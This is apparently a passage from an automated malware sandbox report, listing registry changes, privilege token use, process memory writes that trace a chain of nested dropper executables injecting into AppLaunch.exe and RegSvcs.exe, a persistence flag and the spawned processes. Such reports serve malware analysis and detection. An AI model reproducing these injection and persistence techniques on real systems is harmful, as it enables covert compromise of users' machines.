Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\4A3.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\60C1.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6381.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2804 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe
PID 2144 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2144 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 2144 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe
PID 3544 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 3544 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 3544 wrote to memory of 3628 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe
PID 3628 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 3628 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 3628 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe
PID 3628 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 3628 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 3628 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3252 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3544 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe
PID 3544 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe
PID 3544 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2144 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe
PID 2144 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe
PID 2144 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 624 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2804 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe
PID 2804 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe
PID 2804 wrote to memory of 2500 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe
PID 2500 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe C:\Windows\system32\cmd.exe
PID 2500 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe C:\Windows\system32\cmd.exe
PID 4640 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 4928 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 3856 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4640 wrote to memory of 3856 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 2268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 2820 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4928 wrote to memory of 2820 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3856 wrote to memory of 4732 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tw9sk06.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dn4Re20.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MS3rR13.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1vl66Xo1.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Bx2067.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3252 -ip 3252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1460 -ip 1460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1460 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3252 -s 592

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3TQ78QB.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1984 -ip 1984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 580

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4iG636EF.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 624 -ip 624

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 624 -s 572

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A633.tmp\A634.tmp\A644.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5fd4vF9.exe"

